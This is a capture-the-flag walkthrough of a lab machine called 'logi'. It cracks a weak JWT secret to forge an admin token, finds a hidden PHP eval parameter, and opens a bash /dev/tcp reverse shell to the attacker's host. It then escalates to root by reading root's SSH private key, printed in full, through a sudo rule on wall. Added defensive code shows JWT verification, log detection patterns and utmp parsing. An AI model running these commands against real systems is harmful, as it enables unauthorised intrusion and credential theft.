Information Gathering

```cmd
┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.31.194  08:00:27:18:03:eb       PCS Systemtechnik GmbH

┌──(root㉿kali)-[~]
└─# IP=192.168.31.194
```

```cmd
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-30 14:25 EDT
Nmap scan report for logi (192.168.31.194)
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: TI15 AME\xE5\x8A\xA9\xE5\xA8\x81
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:18:03:EB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.65 ms logi (192.168.31.194)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.23 seconds
```

First, let's see what the home page contains.

```cmd
┌──(root㉿kali)-[~]
└─# curl -s $IP
...
<!--ame:jiayouachunyu-->
```

Directory scan

```cmd
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.194
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,shtml,php,php3,tar,gz,txt,html,bk,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 3281]
/.html                (Status: 403) [Size: 278]
/user                 (Status: 200) [Size: 2170]
/user.php             (Status: 200) [Size: 2170]
/admin                (Status: 200) [Size: 1576]
/admin.php            (Status: 200) [Size: 1576]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================
```

The credentials from the HTML comment, ame:jiayouachunyu, log into user.php and we get a JWT:

```text
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJtb2JhbiIsImlhdCI6MTc1OTI1NzEwMywiZXhwIjoxNzU5MjYwNzAzLCJzdWIiOiJhbWUiLCJyb2xlIjoidXNlciJ9.iMbyjqjyjHxyQlTLdU8KmYdq7WlfnFQbQleI8-8lLpE
```

Brute-force the JWT signing secret with jwt_tool

```cmd
┌──(kali㉿kali)-[~/Desktop/jwt_tool]
└─$ python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJtb2JhbiIsImlhdCI6MTc1OTIxNDAwNSwiZXhwIjoxNzU5MjE3NjA1LCJzdWIiOiJhbWUiLCJyb2xlIjoidXNlciJ9.3_7R14x70FFFh6OI43EOvm31WwHKtQmS7s-hUdm7y1g -C -d "/usr/share/wordlists/rockyou.txt"

(jwt_tool ASCII-art banner)
Version 2.3.0                @ticarpi

/home/kali/.jwt_tool/jwtconf.ini

Original JWT: 

[+] nevergiveup is the CORRECT key!
You can tamper/fuzz the token contents (-T/-I) and sign it using:
python3 jwt_tool.py [options here] -S hs256 -p "nevergiveup"
```

The secret is nevergiveup.

Decoding the JSON Web Token shows the payload is:

```json
{
  "iss": "moban",
  "iat": 1759257103,
  "exp": 1759260703,
  "sub": "ame",
  "role": "user"
}
```

Change it to:

```json
{
  "iss": "moban",
  "iat": 1759257103,
  "exp": 1759260703,
  "sub": "ame",
  "role": "admin"
}
```

Then re-encode and re-sign it with the recovered secret to get:

```text
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJtb2JhbiIsImlhdCI6MTc1OTI1NzEwMywiZXhwIjoxNzU5MjYwNzAzLCJzdWIiOiJhbWUiLCJyb2xlIjoiYWRtaW4ifQ.LeStfNXO7i1_t7bhnHM7HL0uqMUoKC56XxQy3xkcjhQ
```

Swap the cookie in the browser and we are in:

```html
<!doctype html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <title>Admin Area</title>
  <style>
  body{font-family:Segoe UI,Microsoft Yahei,Arial;background:#071029;color:#e6eef8;padding:30px}
  .card{max-width:900px;margin:30px auto;padding:20px;background:#081428;border-radius:8px}
  .btn{display:inline-block;padding:8px 12px;border-radius:6px;background:#1e90ff;color:#fff;text-decoration:none}
  .notice{color:#9fb0cc;margin-top:8px}
  </style>
</head>
<body>
<div class="card">
  <h2>欢迎 — 管理员</h2>
  <p>你好,ame。你的身份已通过验证。</p>
  <div style="margin:16px 0;padding:12px;background:#061226;border-radius:6px">
    <p><strong>karsakarsa369.php</strong></p>
    <p>https://www.jwt.io/</p>
  </div>
</div>
</body>
</html>
```
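The token was forgeable for two reasons a server-side verifier should catch: the HS256 secret was a single dictionary word, far below the 256-bit minimum RFC 7518 sets for HMAC keys, and the `role` claim was trusted as soon as the signature checked out. The Python below is an added example for this write-up, not the box's code or jwt_tool's; it implements the verification a login handler should do (pinned algorithm, constant-time signature comparison, expiry check) and a key-strength check, using the token that jwt_tool recovered the key for. `now` is passed in explicitly so the expiry check is reproducible; `TAMPERED_TOKEN` is constructed here by pairing the admin payload from the write-up with the original signature.

```python
"""Server-side HS256 JWT verification with the checks the vulnerable login was missing.
Added example for this write-up; not code from the box."""
import base64
import hashlib
import hmac
import json
from typing import Optional

# Token captured in the write-up (the one jwt_tool recovered the secret for).
CAPTURED_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJpc3MiOiJtb2JhbiIsImlhdCI6MTc1OTIxNDAwNSwiZXhwIjoxNzU5MjE3NjA1LCJzdWIiOiJhbWUiLCJyb2xlIjoidXNlciJ9."
    "3_7R14x70FFFh6OI43EOvm31WwHKtQmS7s-hUdm7y1g"
)
WEAK_SECRET = "nevergiveup"  # recovered from rockyou.txt in the write-up

# Constructed: the admin payload from the write-up glued to the ORIGINAL signature,
# i.e. what an attacker without the secret could submit. Must be rejected.
TAMPERED_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJpc3MiOiJtb2JhbiIsImlhdCI6MTc1OTI1NzEwMywiZXhwIjoxNzU5MjYwNzAzLCJzdWIiOiJhbWUiLCJyb2xlIjoiYWRtaW4ifQ."
    "3_7R14x70FFFh6OI43EOvm31WwHKtQmS7s-hUdm7y1g"
)


def _b64url_decode(s: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def secret_is_strong(secret: bytes) -> bool:
    # RFC 7518 section 3.2: an HS256 key must be at least 256 bits (32 bytes).
    return len(secret) >= 32


def verify_hs256(token: str, secret: bytes, now: int) -> Optional[dict]:
    """Return the payload if the token is valid under `secret` at time `now`, else None."""
    try:
        h_b64, p_b64, s_b64 = token.split(".")
        header = json.loads(_b64url_decode(h_b64))
        payload = json.loads(_b64url_decode(p_b64))
        sig = _b64url_decode(s_b64)
    except ValueError:  # wrong segment count, bad base64, bad JSON or encoding
        return None
    # Pin the algorithm server-side: never let the token choose it
    # (rejects alg=none and RSA->HMAC confusion attempts).
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
    # Constant-time comparison so signature checks do not leak timing.
    if not hmac.compare_digest(sig, expected):
        return None
    exp = payload.get("exp")
    if not isinstance(exp, int) or now >= exp:
        return None
    return payload


if __name__ == "__main__":
    print("secret strong enough:", secret_is_strong(WEAK_SECRET.encode()))
    print("captured token verifies with weak secret:",
          verify_hs256(CAPTURED_TOKEN, WEAK_SECRET.encode(), now=1759214100))
    print("payload-swapped token:",
          verify_hs256(TAMPERED_TOKEN, WEAK_SECRET.encode(), now=1759214100))
```

The two takeaways from running it: the captured token verifies under an 11-byte secret, which is exactly why an offline dictionary attack worked, so the secret should be 32 random bytes; and a payload that was edited without re-signing is rejected, which means the only thing that turned the `role` edit into an admin session was the recovered key. Authorisation decisions should additionally be checked against the user record on the server rather than read straight from a client-held claim.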

Following the hint, go to $IP/karsakarsa369.php

```cmd
┌──(root㉿kali)-[~]
└─# curl -s $IP/karsakarsa369.php
fuzz
```

The hint says to fuzz.

```cmd
┌──(root㉿kali)-[~]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://$IP/karsakarsa369.php?FUZZ=test -fs 4 -c

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.31.194/karsakarsa369.php?FUZZ=test
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 4
________________________________________________

:: Progress: [220559/220559] :: Job [1/1] :: 2040 req/sec :: Duration: [0:01:43] :: Errors: 0 ::
```

Several wordlists turned up nothing. Maybe the parameter is being executed but produces no output, so try a time-based blind probe instead.

```cmd
┌──(root㉿kali)-[~]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u "http://$IP/karsakarsa369.php?FUZZ=sleep(5)%3b" -mt '>4000' -timeout 10 -t 40 -c

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.31.194/karsakarsa369.php?FUZZ=sleep(5)%3b
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response time: >4000
________________________________________________

cmd                     [Status: 200, Size: 4, Words: 1, Lines: 1, Duration: 5013ms]
:: Progress: [220559/220559] :: Job [1/1] :: 8000 req/sec :: Duration: [0:01:30] :: Errors: 0 ::
```

The parameter `cmd` is found; its value is evaluated as PHP. Time to write a reverse shell.

Using `system()` was blocked at first, so check which functions are disabled:

```cmd
┌──(root㉿kali)-[~]
└─# curl -g "http://$IP/karsakarsa369.php?cmd=print_r(ini_get('disable_functions'));"
fuzzsystem,passthru,shell_exec,proc_open,pcntl_exec,dl
```

`exec` is not on the list, so use that.

```cmd
┌──(root㉿kali)-[~]
└─# curl -g "http://$IP/karsakarsa369.php?cmd=exec(%22bash%20-c%20'bash%20-i%20%3E%26%20/dev/tcp/192.168.31.58/4444%200%3E%261'%22);"

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.31.58] from (UNKNOWN) [192.168.31.194] 59080
bash: cannot set terminal process group (417): Inappropriate ioctl for device
bash: no job control in this shell
www-data@logi:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
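From the defender's side, everything between the parameter fuzz and the reverse shell leaves a clear trail in the Apache access log: hundreds of requests to one PHP script that differ only in the query-parameter name, followed by requests whose parameter value is PHP source. The Python below is an added example for this write-up (not the box's code) that flags both patterns in combined-format log lines. The log lines are constructed to mirror the requests made above; `analyze`, `LOG_RE` and `PHP_CODE_RE` are names chosen here.

```python
"""Flag parameter-name fuzzing and PHP code in query strings in Apache access logs.
Added example for this write-up; the sample lines are constructed, not from the box."""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in Apache "combined" format, modelled on the write-up's requests.
SAMPLE_LOG = """\
192.168.31.58 - - [30/Sep/2025:14:40:01 -0400] "GET /karsakarsa369.php?index=test HTTP/1.1" 200 4 "-" "Fuzz Faster U Fool v2.1.0-dev"
192.168.31.58 - - [30/Sep/2025:14:40:01 -0400] "GET /karsakarsa369.php?images=test HTTP/1.1" 200 4 "-" "Fuzz Faster U Fool v2.1.0-dev"
192.168.31.58 - - [30/Sep/2025:14:40:01 -0400] "GET /karsakarsa369.php?download=test HTTP/1.1" 200 4 "-" "Fuzz Faster U Fool v2.1.0-dev"
192.168.31.58 - - [30/Sep/2025:14:40:02 -0400] "GET /karsakarsa369.php?news=test HTTP/1.1" 200 4 "-" "Fuzz Faster U Fool v2.1.0-dev"
192.168.31.58 - - [30/Sep/2025:14:40:02 -0400] "GET /karsakarsa369.php?cmd=sleep(5)%3b HTTP/1.1" 200 4 "-" "Fuzz Faster U Fool v2.1.0-dev"
192.168.31.58 - - [30/Sep/2025:14:43:10 -0400] "GET /karsakarsa369.php?cmd=print_r(ini_get('disable_functions')); HTTP/1.1" 200 48 "-" "curl/8.9.1"
192.168.31.58 - - [30/Sep/2025:14:44:02 -0400] "GET /karsakarsa369.php?cmd=exec(%22bash%20-c%20'bash%20-i%20%3E%26%20/dev/tcp/192.168.31.58/4444%200%3E%261'%22); HTTP/1.1" 200 4 "-" "curl/8.9.1"
10.0.0.7 - - [30/Sep/2025:14:45:00 -0400] "GET /user.php HTTP/1.1" 200 2170 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# PHP calls seen in the write-up plus the usual command-execution family, and the
# bash /dev/tcp pseudo-device used for the reverse shell. Matched on the DECODED value.
PHP_CODE_RE = re.compile(
    r"\b(?:sleep|exec|system|passthru|shell_exec|popen|proc_open|eval|ini_get|print_r)\s*\("
    r"|/dev/tcp/",
    re.IGNORECASE,
)

Hit = Tuple[str, str, str, str]  # (client ip, path, parameter name, decoded value)


def analyze(log_text: str, fuzz_threshold: int = 4) -> Tuple[List[Tuple[str, str]], List[Hit]]:
    """Return (fuzzing sources, code hits).

    fuzzing sources: (ip, path) pairs that sent at least `fuzz_threshold` distinct
    parameter names to the same script; a legitimate client reuses the same few names.
    code hits: individual parameters whose decoded value looks like PHP code."""
    param_names: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
    code_hits: List[Hit] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined line; skip rather than crash
        url = urlsplit(m["target"])
        # parse_qsl percent-decodes values, so "sleep(5)%3b" is inspected as "sleep(5);".
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            param_names[(m["ip"], url.path)].add(name)
            if PHP_CODE_RE.search(value):
                code_hits.append((m["ip"], url.path, name, value))
    fuzzing = [key for key, names in param_names.items() if len(names) >= fuzz_threshold]
    return fuzzing, code_hits


if __name__ == "__main__":
    sources, hits = analyze(SAMPLE_LOG)
    for ip, path in sources:
        print(f"parameter fuzzing: {ip} -> {path}")
    for ip, path, name, value in hits:
        print(f"code in query: {ip} {path} {name}={value!r}")
```

The default access log records neither response time nor the response body, so the time-based probe is only visible as a burst of requests; adding `%D` to the `LogFormat` makes the 5-second outliers of a `sleep()` probe directly searchable. On the hardening side, the lesson of the `disable_functions` check above is that a blocklist that forgets `exec` (and `popen`, `proc_open` was listed but `exec` was not) is no barrier at all; the real fix is not to pass request input to `eval()`.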

Stabilize the shell

```text
Ctrl + Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
```

Lateral Movement

Look at recently modified files

```cmd
www-data@logi:/var/www/html$ find /var -type f -printf '%T@ %TY-%Tm-%Td %TH:%TM %p\n' 2>/dev/null | sort -nr | head -n 100 | cut -d' ' -f2-
...
2025-09-28 10:47 /var/backups/passwd
...
```

This looks like a password file.

```cmd
www-data@logi:/var/www/html$ cat /var/backups/passwd
xiangwozheyangderen
```

Try it as ame's password

```cmd
www-data@logi:/var/www/html$ su ame
Password: 
ame@logi:/var/www/html$ id
uid=1000(ame) gid=1000(ame) groups=1000(ame)
```

Privilege Escalation

List the commands the current user may run through sudo

```cmd
ame@logi:~$ sudo -l
Matching Defaults entries for ame on logi:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\://sbin\:/usr/bin\:/sbin\:/bin

User ame may run the following commands on logi:
    (ALL) NOPASSWD: /usr/bin/wall
```

Looking up wall on GTFOBins shows it can be used to escalate privileges:

The textual file is dumped on the current TTY (neither to stdout nor to stderr).

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

```bash
LFILE=file_to_read
sudo wall --nobanner "$LFILE"
```

```bash
ame@logi:~$ sudo wall --nobanner "/root/.ssh/id_rsa"
ame@logi:~$ 
```

There is no output here, though. That is because wall does not print to the current shell: it "broadcasts" the message to the terminals (TTYs) of every user currently logged in to the system.
The session we are in (www-data -> su ame) is a reverse shell, which the system does not treat as a standard interactive login terminal (TTY). It is essentially just a socket with /bin/bash's input and output redirected to it, so when wall runs, the reverse shell is not in its list of broadcast targets.
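Concretely, wall builds its target list from the utmp database, where login, sshd and getty register each real session as a USER_PROCESS record naming the tty; a bash started from a PHP `exec()` with a socket on its standard descriptors writes no such record. The Python below is an added example for this write-up (not the box's code and not util-linux's wall) that parses glibc's 384-byte x86_64 `struct utmp` layout from a constructed sample database and lists the devices a broadcast would reach. `make_record`, `wall_targets`, `UTMP_FMT` and the sample sessions are all constructed here.

```python
"""List the terminals a `wall` broadcast would reach by reading utmp records.
Added example for this write-up; the sample database is constructed."""
import os
import struct
from typing import List

# utmp ut_type values (utmp.h); wall only writes to USER_PROCESS entries.
BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 2, 7, 8

# glibc x86_64 `struct utmp`: ut_type(+2 pad), ut_pid, ut_line[32], ut_id[4],
# ut_user[32], ut_host[256], ut_exit{2 shorts}, ut_session, ut_tv{2 ints},
# ut_addr_v6[4], 20 bytes reserved. Assumed layout; total 384 bytes.
UTMP_FMT = "<h2xi32s4s32s256s2hi2i4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)


def make_record(ut_type: int, pid: int, line: str, user: str, host: str = "") -> bytes:
    """Constructed helper: build one record, NUL-padding the strings like glibc does."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), *([0] * 9))


def wall_targets(utmp_bytes: bytes) -> List[str]:
    """Return /dev/<ut_line> for every live user session, as wall would select them."""
    targets = []
    for off in range(0, len(utmp_bytes) - UTMP_SIZE + 1, UTMP_SIZE):
        ut_type, _pid, line, _id, user = struct.unpack(UTMP_FMT, utmp_bytes[off:off + UTMP_SIZE])[:5]
        if ut_type != USER_PROCESS or not user.rstrip(b"\0"):
            continue  # boot/runlevel markers and logged-out slots are skipped
        targets.append("/dev/" + line.rstrip(b"\0").decode())
    return targets


# Constructed sample: a console login and an ssh login are registered; the reverse
# shell spawned by the web server never appears because nothing registered it.
SAMPLE_UTMP = b"".join([
    make_record(BOOT_TIME, 0, "~", "reboot", "4.19.0-27-amd64"),
    make_record(USER_PROCESS, 612, "tty1", "ame"),
    make_record(USER_PROCESS, 1407, "pts/0", "ame", "192.168.31.58"),
    make_record(DEAD_PROCESS, 1300, "pts/1", ""),  # session that has logged out
])


if __name__ == "__main__":
    print("sample broadcast targets:", wall_targets(SAMPLE_UTMP))
    if os.path.exists("/var/run/utmp"):  # live view on a Linux host with glibc utmp
        with open("/var/run/utmp", "rb") as f:
            print("this host:", wall_targets(f.read()))
```

Run on the real `/var/run/utmp` of the box from the ssh session, this lists the pts the ssh login was given, which is exactly why the broadcast appeared there and not in the reverse shell. For an auditor, the more useful observation is the one that produced the foothold: a NOPASSWD sudo rule for any binary that opens an arbitrary file as root is a file-read primitive, and `wall --nobanner` is simply one of the documented cases.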

Logging in over ssh and running it again works:

```cmd
┌──(root㉿kali)-[~]
└─# ssh ame@$IP
The authenticity of host '192.168.31.194 (192.168.31.194)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:2: [hashed name]
    ~/.ssh/known_hosts:4: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.31.194' (ED25519) to the list of known hosts.
ame@192.168.31.194's password: 
Linux logi 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 28 10:35:26 2025 from 172.20.10.11
ame@logi:~$ sudo wall --nobanner "/root/.ssh/id_rsa"

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAgEAnaT0B+kb64e8z3am+GYUeZQ91emxMpRnMWpP0kh3fZCoBJFf5PNX
m6U1vZ33KCr84+gPmwaSzbw6YooQ87sFGosSwHSM/qp4zio8/PCHJicFgSxb+VFNdWu4gG
VbfU12OMnAlIktH8HPr53z3UzaltGubxPxAm55i2XOAu2mXvZQ7KJpD7ONM1l02oCp24zZ
dh3zIomqaEslfFEQz3TEkMhVxUBi7MIGM9khrrmbsZUthKQW1/hGm9hle9tFOeWtBVdMpk
zKRrgrNfEHMQ3gviNesmmvxKCTCmxTt0D37sFrE9qW9f3ZxSclXBNLEfNd66VtYhalvJdP
nKIIh6dN1FCyzGtn9U+vKc4uT2Zz9cEh8gmbEZbCUTmQX+LPMcCzuDTZpUY783zMNiYo1Y
vFaW2Nk0SWcdP1Q+wo2w6BSW9cjYSFwLkikVEIwxZ98J9mFLasEzAw4bQ2gSq1QxabjvWh
g8+w1U6nyBgcKmtY4mPi1kWu4Yq88JYsRLcTOl+CamSMPbwA6r5XKDgDaVPVrwqN4ix+dc
sNJFnlSgS/gfT/MQUuXE5/Tm2I4S6JoPsBlqaKsZvGz3U21HMQV0fA5CV0PVwvPBn2C+SB
2EwSNfSGp3lEL1q0/UHy+Y0awsDOizhWxb/2TLsawf0OQgLykxyCbxr8E9aazVZ8mMJ9t4
EAAAdA5YGAIuWBgCIAAAAHc3NoLXJzYQAAAgEAnaT0B+kb64e8z3am+GYUeZQ91emxMpRn
MWpP0kh3fZCoBJFf5PNXm6U1vZ33KCr84+gPmwaSzbw6YooQ87sFGosSwHSM/qp4zio8/P
CHJicFgSxb+VFNdWu4gGVbfU12OMnAlIktH8HPr53z3UzaltGubxPxAm55i2XOAu2mXvZQ
7KJpD7ONM1l02oCp24zZdh3zIomqaEslfFEQz3TEkMhVxUBi7MIGM9khrrmbsZUthKQW1/
hGm9hle9tFOeWtBVdMpkzKRrgrNfEHMQ3gviNesmmvxKCTCmxTt0D37sFrE9qW9f3ZxScl
XBNLEfNd66VtYhalvJdPnKIIh6dN1FCyzGtn9U+vKc4uT2Zz9cEh8gmbEZbCUTmQX+LPMc
CzuDTZpUY783zMNiYo1YvFaW2Nk0SWcdP1Q+wo2w6BSW9cjYSFwLkikVEIwxZ98J9mFLas
EzAw4bQ2gSq1QxabjvWhg8+w1U6nyBgcKmtY4mPi1kWu4Yq88JYsRLcTOl+CamSMPbwA6r
5XKDgDaVPVrwqN4ix+dcsNJFnlSgS/gfT/MQUuXE5/Tm2I4S6JoPsBlqaKsZvGz3U21HMQ
V0fA5CV0PVwvPBn2C+SB2EwSNfSGp3lEL1q0/UHy+Y0awsDOizhWxb/2TLsawf0OQgLykx
yCbxr8E9aazVZ8mMJ9t4EAAAADAQABAAACACjO25D0qhKVZ6341A43NpOmaT9nqEQkoHXt
RE52DeCGQsgz7bPxvjr/UGMOcj2Gq0I//1ItKHFziVWa0fqV7iNJ3wfM4/bEoFMWIgWEKi
gZL9aZahGnFzsPMIqkMkPEepcGuwB4ZiLzY9TdOZSO4YLrMpF0gw4TFQmdx++AH3Izpw0q
mbHD1Ah33sT1S4MW+fAWnqrRIjivQzvkLErXuk6UXYebPEB3lW10hsCZMZGNwWO1qmgrz/
Nl2Bdw0oHDT7+zMpdWB4K5CA6Fn0v2gLgXpdrfeu2Wd5naIu2sNsIqdZKFIlD5bpcXpBcq
s2MpMaXfg+pBXJPuQ2CTnUuoZn/ohgAdRZWBRhz3BPAdj20YDZB1FR8d7gm8wuprr51t0y
Qu3liLLv7utHZ6twV+twHEtLZcfk4u5nK5eUhdUQv7KnRjmO51XD0vgT9sJcdvrCo/EroU
1bErEML7Jx08s5d6veWyCaw0P9hxSYqWA/8sn+cBA4nRio4f835u42DL+asE8vvPpJgs+p
SxZlTCc5j362BpB/r6tXbt5/gVcAlY7eG9Mi0XQE6MrRVFPHvjj4aVrJoahAvuTSCOwKSr
DuGas5MsupLXtsvnQ+OLXoLfmau9dJkwceV9boMWijy/GUjq2PuXMzZCIzGdke0tM2CDzl
XtnMsZxZlM0I2hbKQVAAABAQCbUliOaBlCdEsZ/uhF3+QP/+KepMQt5E2XCyZmEKbdvVXI
BU5DfJidd00juWV25gS+JeKJ5AmGcJMJZxzFNmcb4S08ydUxs5J0BuYJLlT7Hl8Wx+cv7C
xuI69zfVKrEuXu54kfkUmn6M5Aq+VlAvAms8IS67jbVKf/V2pKvT9cd/dGK+A5YVihGxeT
9ST8g3S/+FviJeyjuMK8WGYh6774LvlRufzvxBRevdO/zVKH2DAFLEWGEFkt9TEGS3MDri
gMAnF9in23bJ3ksoEQjhcafQL+UXGalUTKWmbwEfvuXtX48j7a4G/0ejBbChKQdRLd2n7O
+6hRr97q9jur4V8bAAABAQDJegrTfveMpUcwV9S9/PHjaq9YD1WvUSXMjOGGrGZyvg/czz
GDbb+G/NqojFFoswqQ8nl3yw9yOiHvanHLAdLyG/xB76X07cupVHnY+N+M5dAlXDYpE0bq
P3XVWOGRz55ZJ+ylI3DKmGseqcAKVJNhc9B0ZzgpyYDjAldbngiHilV+7JxCIXzxN2GhAA
UyQLAFBQ54UKMdrJtAQOXBvSZgZ06ZmDqqC0Z/+YTlZ8Jyezl5le4yG42ilSYal/E+W1sc
9Bmz3QFyvSP5pqTKy0/xfvr6RO9LJbt6i5mME+V7VV77HkW7O11qFF2w2p/zOjXpyXM81N
ueXYKFdXSQuPw/AAABAQDITkel25RoCYjYRG/oE2G7qcMwdUrVsas5o0cXdhav3oot121T
Hfdk1d+ZmHgJ9GEwnn630xXEbKfpRxkNRhJN5MCNELGpMyY0PrTuT1Z+eajhsjtoFjIJ3y
veWG/EMR1oeDIUfD8zIdZ9xTsUL3Z9iS3aLL5prq0+byOCVQr7WQyiK/SNMmF6sRTNFHhy
CTJ0i6yKFl+EEcG2O0KyGWNeCjXhmxOaM4J1SLXemfPmYLKJPjlp9+/suJrOVZwrLLJe5w
3g0lGOKdY/B+KeiRBh7+rM4s+n0LfG5AZWztTNBn1I8nI5Ox3VV2Xml+EHlA/jzgISDTGh
yFwO2nf1b1w/AAAACXJvb3RAbG9naQE=
-----END OPENSSH PRIVATE KEY-----
```

Save the private key on the attacking machine (I named it id_rsa_logi), strip the trailing spaces and tabs that wall padded each line with, then log in with the key:

```cmd
┌──(root㉿kali)-[/home/kali/Desktop]
└─# sed -i 's/[ \t]*$//' id_rsa_logi

┌──(root㉿kali)-[/home/kali/Desktop]
└─# chmod 600 id_rsa_logi

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh -i id_rsa_logi root@$IP
Linux logi 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 29 07:40:55 2025 from ::1
root@logi:~# id
uid=0(root) gid=0(root) groups=0(root)
```

```text
root@logi:~# cat /home/ame/user.txt
user:{niudexiongdiniude}
root@logi:~# cat /root/provemyself.txt
root{xiangrootzheyangderen}
```